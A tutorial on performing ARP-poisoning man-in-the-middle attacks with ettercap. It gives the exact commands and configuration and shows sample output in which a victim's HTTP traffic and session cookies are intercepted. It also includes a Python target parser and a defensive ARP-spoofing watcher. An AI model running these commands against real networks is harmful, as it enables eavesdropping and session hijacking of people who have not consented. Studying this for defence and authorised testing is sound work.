
Man-In-The-Middle Attacks With Ettercap
Introduction
This post explains how to execute a man-in-the-middle attack on Linux. Only the actual attack is described here. The mechanisms of ARP poisoning and man-in-the-middle attacks are explained in a different post.
- A man-in-the-middle attack can be achieved in various ways, but MITM through ARP poisoning is a common method.
In this post we demonstrate a MITM with the Ettercap tool. Ettercap is a multipurpose sniffer/interceptor/logger for switched LANs, and pretty much the Swiss army knife of ARP poisoning. Every security researcher should include it in their toolbox, and it is included in the BackTrack Linux distribution. Ettercap features a pretty nice GUI, but in this post we only use the text mode.
Command Syntax
The ettercap program has the following syntax:
ettercap [OPTIONS] [TARGET1] [TARGET2]
The targets can be IPs and MACs, and specific TCP and UDP ports can also be targeted. A simple description of the TARGET1 and TARGET2 syntax is given below. Read the target specification section of the man page for details.
TARGET is in the form MAC/IPs/PORTs. If you omit any of the parts, a wildcard is used for that part. Examples:
- //80 means ANY MAC address, ANY IP and ONLY port 80
- /10.0.0.1/ means ANY MAC address, ONLY IP 10.0.0.1 and ANY port
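The following parser and matcher for the MAC/IPs/PORTs target syntax described above is an added example, not ettercap's own code. It handles only the single-value and wildcard forms shown on this page (no IP lists or port ranges), and validates each part before use.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")

@dataclass(frozen=True)
class Target:
    mac: Optional[str]    # None means any MAC address
    ip: Optional[str]     # None means any IP address
    port: Optional[int]   # None means any port

def parse_target(spec: str) -> Target:
    """Parse MAC/IPs/PORTs; an empty part is a wildcard. Only the single-value
    forms shown on the page are handled here (no lists or ranges)."""
    parts = spec.split("/")
    if len(parts) != 3:
        raise ValueError(f"expected MAC/IPs/PORTs, got {spec!r}")
    mac, ip, port = (p.strip() for p in parts)
    if mac:
        mac = mac.lower()
        if not MAC_RE.match(mac):
            raise ValueError(f"bad MAC address {mac!r}")
    if ip:
        ip = str(ipaddress.IPv4Address(ip))   # raises ValueError on bad input
    if port and not 0 < int(port) < 65536:
        raise ValueError(f"bad port {port!r}")
    return Target(mac or None, ip or None, int(port) if port else None)

def matches(t: Target, mac: str, ip: str, port: int) -> bool:
    """True if a (MAC, IP, port) triple falls within the target specification."""
    return ((t.mac is None or t.mac == mac.lower())
            and (t.ip is None or t.ip == ip)
            and (t.port is None or t.port == port))
```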
Useful command line options are:
Parameter | Description | Required |
---|---|---|
-T / -G / -D | Use the console interface / use the GTK+ GUI / daemonize (no interface) | Yes, choose one |
-q | Quiet mode. It can be used only in conjunction with the console interface. It does not print packet content. | No |
-i | Use the specified interface | No |
-M | Start a MITM attack using the provided parameters. The possible methods are arp, dhcp, icmp and port. | No |
-M arp[:args] | Start an ARP MITM attack. The arguments are described below. | No |
Ettercap Configuration
If you do a MITM attack with ettercap, it will have to ‘forward’ packets from the victim to the correct destination, and the other way around. In order for this to work you need to change your configuration file:
$ nano /usr/local/etc/etter.conf
Look for the following lines in the file, and uncomment them by removing the hashes (except for the one next to “if”). Save and close the file.
Change:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
To this:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
For ARP poisoning attacks, the configuration file has a lot of options. You should only change these if you know what you are doing. One example is the arp_poison_delay configuration option, which changes the interval at which ettercap re-spoofs the victim(s) during an ARP MITM attack:
arp_poison_warm_up = 1 # seconds
arp_poison_delay = 10 # seconds
The arp_poison_warm_up variable is the interval between the first five spoofed ARP packets. After that, the interval between the packets changes to arp_poison_delay.
Examples
We have an example scenario:
Host | Details |
---|---|
Attacker (the host running ettercap) | MAC=22:22:22:22:22:22 |
Victim | IP=1.2.3.4 |
Gateway | IP=1.2.0.0 |
All these hosts are in the same subnet (switched network). Remember that this is required for ARP communication.
MITM on an Entire Subnet (not recommended)
ettercap -T -M arp // //
This is what the command line options do:
Option | Meaning |
---|---|
-T | Tells ettercap to use the text interface |
-M | Tells ettercap to execute a MITM attack. |
arp | Denotes that ARP poisoning should be used to perform the attack. |
// // | Tells ettercap that TARGET1 and TARGET2 consist of all hosts in the subnet. |
The result is that for every combination of hosts in the subnet, both sides have their ARP cache poisoned. If there are 100 hosts in the subnet, this will cause a storm of 20,000 ARP packets to be sent. When successful, all network traffic will pass through the attacker’s system. I suggest only doing this on the smallest of networks.
Unidirectional MITM: Victim to Gateway
A more sensible and stealthy command is:
ettercap -T -M arp:oneway,remote /1.2.3.4/ /1.2.0.0/
This is what the command line options mean:
Option | Meaning |
---|---|
-T | Tells ettercap to use the text interface |
-M | Tells ettercap to execute a MITM attack. |
arp | Denotes that ARP poisoning should be used to perform the attack. |
oneway | The oneway option of the arp method specifies that the poisoning should be unidirectional: only from TARGET1 to TARGET2. Poisoning normal clients is less risky than poisoning a gateway, where an ARP watcher could be in place. By putting the gateway in TARGET2, it remains oblivious to the attack. |
remote | The remote option of the arp method tells ettercap to not only sniff direct connections between TARGET1 and TARGET2, but also connections that pass through a TARGET to a remote IP, i.e. if one of the hosts is a gateway. |
/1.2.3.4/ | This tells ettercap that TARGET1 is the IP 1.2.3.4. The ARP cache of this host will be targeted. |
/1.2.0.0/ | This tells ettercap that TARGET2 is the IP 1.2.0.0. Because of the oneway directive this host is not poisoned. |
Here is what the command does:
- First, the TARGET ranges are scanned with ARP requests to find all active hosts and corresponding MAC addresses. In this case there is only one host per range: 1.2.3.4 in GROUP1 and 1.2.0.0 in GROUP2.
- Then all possible GROUP1 and GROUP2 combinations are spoofed. The only combination is 1.2.3.4 – 1.2.0.0, and because of the oneway argument only the ARP cache of 1.2.3.4 is poisoned:
- Ettercap first sends a spoofed ICMP echo request (from IP 1.2.0.0) to force the ARP entry in the cache. Then it immediately sends a spoofed ARP reply to the victim at 1.2.3.4, containing the gateway IP 1.2.0.0 and the attacker’s MAC address 22:22:22:22:22:22. The victim updates its ARP cache, and any packets that it thinks it sends to the gateway are actually transmitted to the attacker.
- Ettercap automatically sniffs all traffic from victim to gateway, then it forwards it to the gateway. Traffic in the other direction (gateway->victim) does not pass through the attacker, so that cannot be sniffed.
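The spoofed reply described above (gateway IP 1.2.0.0 paired with the attacker's MAC 22:22:22:22:22:22) is exactly the event an ARP watcher on the victim's segment can detect. The following watcher is an added example, not ettercap's code: it parses raw Ethernet/ARP frames and alerts when a known IP changes MAC or when the ARP sender MAC disagrees with the frame's source MAC. The victim and gateway MACs in the constructed sample frames are assumptions.

```python
import struct

ETH_P_ARP = 0x0806

def parse_arp(frame: bytes):
    """Parse an Ethernet/ARP frame (IPv4 over Ethernet only) into the fields a
    watcher cares about; return None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {"op": op, "eth_src": mac(frame[6:12]), "sha": mac(sha),
            "spa": ip(spa), "tha": mac(tha), "tpa": ip(tpa)}

class ArpWatcher:
    """Keeps an IP -> MAC table and reports when a known IP turns up with a
    different MAC, which is what the spoofed reply does to the gateway entry."""
    def __init__(self, pinned=None):
        self.table = dict(pinned or {})   # pre-pinned entries, e.g. the gateway
        self.alerts = []

    def observe(self, frame: bytes):
        p = parse_arp(frame)
        if p is None:
            return None
        alert = None
        if p["eth_src"] != p["sha"]:      # ARP sender MAC not matching frame source
            alert = f"{p['spa']}: ARP sender {p['sha']} != frame source {p['eth_src']}"
        known = self.table.setdefault(p["spa"], p["sha"])
        if known != p["sha"]:
            alert = f"{p['spa']} changed from {known} to {p['sha']} (opcode {p['op']})"
        if alert:
            self.alerts.append(alert)
        return alert

# Constructed sample frames, not captured traffic. Victim 11:11:11:11:11:11 and
# gateway 44:44:44:44:44:44 are assumed; attacker 22:22:22:22:22:22 is from the page.
ARP_HDR = "0001080006040002"   # Ethernet/IPv4, hlen 6, plen 4, opcode 2 (reply)
GATEWAY_REPLY = bytes.fromhex("111111111111" "444444444444" "0806" + ARP_HDR
                              + "444444444444" "01020000" "111111111111" "01020304")
SPOOFED_REPLY = bytes.fromhex("111111111111" "222222222222" "0806" + ARP_HDR
                              + "222222222222" "01020000" "111111111111" "01020304")

def demo():
    w = ArpWatcher()
    return [w.observe(GATEWAY_REPLY), w.observe(SPOOFED_REPLY)]
```

Pinning the gateway's real MAC at start-up (the pinned argument) means the very first spoofed reply is flagged, rather than only a change relative to whatever was learned first.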
Sniffing with a Filter
If your host is acting as a gateway, ettercap can sniff the traffic that passes through it.
ettercap -T -z --proto tcp -f "src host 1.2.3.4 or port 80" //
Use the above syntax to listen for and display all TCP traffic with source IP 1.2.3.4 or source/destination port 80.
Option | Meaning |
---|---|
-T | Tells ettercap to use the text interface |
-z | Silent mode. Tells ettercap to skip the initial ARP scan of the entire subnet (it does this even before sniffing) |
--proto tcp | Tells ettercap to only sniff TCP traffic |
-f "src host 1.2.3.4 or port 80" | Tells ettercap to apply the specified libpcap filter to the traffic |
// | Tells ettercap that we want to look at traffic from the entire subnet |
In Practice
Find the IP of the default gateway (router):
$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
132.49.120.0    0.0.0.0         255.255.240.0   U     0      0        0 eth0
0.0.0.0         132.49.120.1    0.0.0.0         UG    100    0        0 eth0
Attack the host with IP 132.49.120.168.
$ sudo ettercap -T -M arp:oneway,remote /132.49.120.168/ /132.49.120.1/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 -> 00:01:40:34:A1:92     132.49.120.121     255.255.240.0

Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 132.49.120.168 00:2B:4D:11:66:30

 GROUP 2 : 132.49.120.1 00:00:0C:07:AC:00
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

Mon Jun 20 14:08:31 2011
TCP  132.89.120.168:8304 --> 83.143.78.29:80 | AP

tSuite/TestController.asp?TestTypeID=,8,12,.
Cookie: ASPSESSIONIDAASASSDC=ICEHOOJDKFAIDEPINIGONNAJ; __utma=236849091.1657384024.1308593949.1308593949.1308593949.1; __utmb=236849091; __utmc=236849091; __utmz=236849091.1308593949.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none).
.
../...3C..e.._.......:..Q4.|.'...+h.(.nj.T..f0..-.5..mF.8^T=n[IK{9T..F...I(.!~6....4O.J.uaH...-..S......e..76wJ..u..Es.....4..}}'.N....F.......:.~j...M^.....W......tC.....v.s..%..b.Z..T7u./....!..C*...x...0e...5.#..n..Q.X..&r..>.&T.lz../.Z2T.".NKi...a.q......."....b+........-.:....j......e=. ~Xj.5.|,.. .,a...z|....LP,..>.......).u.......
We are now picking up the traffic between our victim and some website (the above packet looks like HTTP traffic).